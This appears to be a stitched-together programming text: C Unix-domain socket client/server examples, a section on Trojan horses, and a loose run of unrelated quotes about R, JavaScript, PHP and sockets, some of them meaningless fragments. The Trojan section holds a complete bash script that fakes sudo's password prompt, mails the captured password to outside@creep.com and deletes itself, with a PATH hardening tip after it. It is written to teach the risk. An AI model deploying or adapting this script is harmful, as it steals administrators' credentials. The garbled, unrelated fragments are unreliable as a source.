#define BUFFER_SIZE 1024

void client_algorithmic_dialog( int client_socket_fd );

{
    /* Omit construction code */

    return_value =
        connect(
            client_socket_fd,
            (struct sockaddr *) &sockaddr_un,
            sizeof( struct sockaddr_un ) );

    if ( return_value == -1 ) assert( 0 );

    if ( return_value == 0 )
    {
        client_algorithmic_dialog( client_socket_fd );
    }

    /* close( client_socket_fd ); <-- optional */

    /* When the client process terminates, */
    /* if the server attempts to read(), */
    /* then read_count will be either 0 or -1. */
    /* This is a message for the server */
    /* to execute close(). */
    exit( EXIT_SUCCESS );
}

void client_algorithmic_dialog( int client_socket_fd )
{
    char buffer[ BUFFER_SIZE ];
    int read_count;

    strcpy( buffer, "hola" );
    write( client_socket_fd, buffer, strlen( buffer ) + 1 );

    /* Leave room for a terminating null byte. */
    read_count = read( client_socket_fd, buffer, BUFFER_SIZE - 1 );

    if ( read_count > 0 )
    {
        buffer[ read_count ] = '\0';
        puts( buffer );
    }
}
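The server and client fragments in this section can be combined into one function for experimentation. In this minimal sketch, a forked child process plays the server and the parent plays the client; hola_round_trip is a hypothetical name, and the socket path is supplied by the caller:

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

/* The client sends "hola"; the server answers "Hola Mundo" (or "Hello World"
   for anything else) and closes the connection. Returns 0 and copies the
   answer into reply on success, or -1 on failure. */
int hola_round_trip( const char *path, char *reply, size_t reply_size )
{
    struct sockaddr_un address = { 0 };
    int server_socket_fd;
    int client_socket_fd;
    ssize_t read_count = -1;
    pid_t pid;

    if ( reply_size == 0 || strlen( path ) >= sizeof address.sun_path ) return -1;
    address.sun_family = AF_UNIX;
    strcpy( address.sun_path, path );

    /* Bind and listen before fork() so the client cannot connect too early. */
    server_socket_fd = socket( AF_UNIX, SOCK_STREAM, 0 );
    if ( server_socket_fd == -1 ) return -1;
    remove( path );
    if ( bind( server_socket_fd, (struct sockaddr *) &address, sizeof address ) == -1
         || listen( server_socket_fd, 1 ) == -1 )
    {
        close( server_socket_fd );
        return -1;
    }

    pid = fork();
    if ( pid == -1 )
    {
        close( server_socket_fd );
        remove( path );
        return -1;
    }

    if ( pid == 0 )
    {
        /* Child (server): accept one connection, answer once, then exit. */
        char input_buffer[ 64 ];
        const char *output;
        int accept_socket_fd = accept( server_socket_fd, NULL, NULL );

        if ( accept_socket_fd == -1 ) _exit( 1 );
        read_count = read( accept_socket_fd, input_buffer, sizeof input_buffer - 1 );
        if ( read_count > 0 )
        {
            input_buffer[ read_count ] = '\0';
            output = strcmp( input_buffer, "hola" ) == 0 ? "Hola Mundo" : "Hello World";
            if ( write( accept_socket_fd, output, strlen( output ) + 1 ) == -1 ) _exit( 1 );
        }
        close( accept_socket_fd );
        _exit( 0 );
    }

    /* Parent (client): the child still holds the listening socket. */
    close( server_socket_fd );
    client_socket_fd = socket( AF_UNIX, SOCK_STREAM, 0 );
    if ( client_socket_fd != -1 )
    {
        if ( connect( client_socket_fd, (struct sockaddr *) &address, sizeof address ) == 0
             && write( client_socket_fd, "hola", strlen( "hola" ) + 1 ) > 0 )
            read_count = read( client_socket_fd, reply, reply_size - 1 );
        close( client_socket_fd );
    }

    /* If the dialog failed, the child might still be waiting in accept(). */
    if ( read_count < 1 ) kill( pid, SIGTERM );
    waitpid( pid, NULL, 0 );
    remove( path );

    if ( read_count < 1 ) return -1;
    reply[ read_count ] = '\0';
    return 0;
}
```

Binding and listening before fork() avoids a race in which the client calls connect() before the server's socket exists.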
A Trojan horse is a program that purports to perform some legitimate function, yet upon execution it compromises the user's security.[93] A simple example is the following malicious version of the Linux sudo command. An attacker would place this script in a publicly writable directory (e.g., /tmp). If an administrator happens to be in this directory, has a PATH that searches the current directory before the system directories, and executes sudo, then the Trojan may execute, compromising the administrator's password.
#!/usr/bin/env bash

# Turn off the character echo to the screen. sudo does this to prevent the user's password from appearing on screen when they type it in.
stty -echo

# Prompt user for password and then read input. To disguise the nature of this malicious version, do this 3 times to imitate the behavior of sudo when a user enters the wrong password.
prompt_count=1
while [ $prompt_count -le 3 ]; do
    echo -n "[sudo] password for $(whoami): "
    read password_input
    echo
    sleep 3  # sudo will pause between repeated prompts
    prompt_count=$(( prompt_count + 1 ))
done

# Turn the character echo back on.
stty echo

echo $password_input | mail -s "$(whoami)'s password" outside@creep.com

# Display sudo's actual error message and then delete self.
echo "sudo: 3 incorrect password attempts"
rm $0

exit 1  # sudo returns 1 with a failed password attempt
To prevent a sudo Trojan horse, place the . entry at the end of the PATH environment variable, or omit it entirely.[94] For example: PATH=/usr/local/bin:/usr/bin:.
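Why the position of the . entry matters can be sketched by searching a PATH-style list from left to right, as a shell does: the first match wins. In this minimal sketch, find_in_path is a hypothetical helper; real shells add details such as command hashing:

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Search the colon-separated directory list path_list from left to right
   for an executable regular file named command. An empty entry means the
   current directory. On success, writes "directory/command" into result
   and returns 0; returns -1 if no entry matches. */
int find_in_path( const char *path_list, const char *command,
                  char *result, size_t result_size )
{
    const char *start = path_list;

    for ( ;; )
    {
        const char *end = strchr( start, ':' );
        size_t length = end != NULL ? (size_t) ( end - start ) : strlen( start );
        struct stat status;
        int written;

        if ( length == 0 )
            written = snprintf( result, result_size, "./%s", command );
        else
            written = snprintf( result, result_size, "%.*s/%s",
                                (int) length, start, command );

        /* The first match wins, so earlier entries shadow later ones. */
        if ( written > 0 && (size_t) written < result_size
             && stat( result, &status ) == 0 && S_ISREG( status.st_mode )
             && access( result, X_OK ) == 0 )
            return 0;

        if ( end == NULL ) return -1;
        start = end + 1;
    }
}
```

With PATH=.:/usr/bin, an executable file named sudo in the current directory is found before /usr/bin/sudo; with the . entry last, the system copy is found first.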
null placeholder is currently in retirement but recommended.
request.open().
PF_UNIX or AF_LOCAL may be used.[81] The AF stands for "Address Family", and the PF stands for "Protocol Family".
The coefficient of determination always lies between 0 and 1 ...
An R script is just a plain text file that you save R code in.
Data frames are the two-dimensional version of a list.
They are far and away the most useful storage structure for data analysis[.]
R calls print each time it displays a result in your console window.
R will execute all of the code in the body and then return the result of the last line of code.
Be careful not to confuse = with ==. = does the same thing as <-.
Javascript lacks a portable mechanism for general network communication[.] ... But thanks to the XMLHttpRequest object, ... Javascript code can make HTTP calls back to its originating server[.]
POST, for example, is suited to calls that affect server state or upload substantial quantities of data.
PHP is a server-side scripting language designed specifically for the Web.
Sockets are a method of IPC that allow data to be exchanged between applications, either on the same host (computer) or on different hosts connected by a network.
The server binds its socket to a well-known address (name) so that clients can locate it.
Normally, the server process is put to sleep in the call to accept, waiting for a client connection to arrive and be accepted.
The above Trojan horse works only if a user's PATH is set to search the current directory for commands before searching the system's directories.